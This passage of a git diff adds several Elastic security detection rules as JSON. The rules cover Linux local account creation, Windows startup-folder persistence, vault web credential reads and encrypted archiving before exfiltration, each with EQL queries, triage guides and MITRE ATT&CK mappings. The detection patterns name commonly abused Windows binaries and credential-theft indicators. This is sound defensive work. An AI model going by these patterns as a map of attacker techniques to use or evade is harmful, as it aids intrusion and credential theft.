"risk_score": 21, + "rule_id": "43d6ec12-2b1c-47b5-8f35-e9de65551d3b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_109.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_109.json new file mode 100644 index 00000000000..98b600b4a5f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_109.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup Persistence by a Suspicious Process", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "440e2db4-bc7f-4c96-a068-65b78da59bde_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_110.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_110.json new file mode 100644 index 00000000000..f9f3c588a16 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_110.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup Persistence by a Suspicious Process", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "440e2db4-bc7f-4c96-a068-65b78da59bde_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10.json new file mode 100644 index 00000000000..08eb2705e46 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Multiple Vault Web Credentials Read", + "query": "sequence by winlog.computer_name, winlog.process.pid with maxspan=1s\n\n /* 2 consecutive vault reads from same pid for web creds */\n\n [any where event.code : \"5382\" and\n (winlog.event_data.SchemaFriendlyName : \"Windows Web Password Credential\" and winlog.event_data.Resource : \"http*\") and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and \n not winlog.event_data.Resource : \"http://localhost/\"]\n\n [any where event.code : \"5382\" and\n (winlog.event_data.SchemaFriendlyName : \"Windows Web Password Credential\" and winlog.event_data.Resource : \"http*\") and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and \n not winlog.event_data.Resource : \"http://localhost/\"]\n", + "references": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=5382", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SchemaFriendlyName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_110.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_110.json new file mode 100644 index 00000000000..af27c248616 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_110.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encrypting Files with WinRar or 7z", + "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the file names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. Check the `process.parent.executable` and `process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n process.name:\"rar.exe\" or ?process.code_signature.subject_name == \"win.rar GmbH\" or\n ?process.pe.original_file_name == \"Command line RAR\"\n ) and\n process.args == \"a\" and process.args : (\"-hp*\", \"-p*\", \"/hp*\", \"/p*\")\n ) or\n (\n ?process.pe.original_file_name in (\"7z.exe\", \"7za.exe\") and\n process.args == \"a\" and process.args : \"-p*\"\n )\n) and\n not process.parent.executable : (\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ManageEngine\\\\*\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Nox\\\\bin\\\\Nox.exe\"\n )\n", + "references": [ + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "45d273fb-1dca-457d-9855-bcb302180c21_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_111.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_111.json new file mode 100644 index 00000000000..e52980e2cc0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_111.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encrypting Files with WinRar or 7z", + "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the file names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. Check the `process.parent.executable` and `process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n process.name:\"rar.exe\" or ?process.code_signature.subject_name == \"win.rar GmbH\" or\n ?process.pe.original_file_name == \"Command line RAR\"\n ) and\n process.args == \"a\" and process.args : (\"-hp*\", \"-p*\", \"/hp*\", \"/p*\")\n ) or\n (\n ?process.pe.original_file_name in (\"7z.exe\", \"7za.exe\") and\n process.args == \"a\" and process.args : \"-p*\"\n )\n) and\n not process.parent.executable : (\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ManageEngine\\\\*\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Nox\\\\bin\\\\Nox.exe\"\n )\n", + "references": [ + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 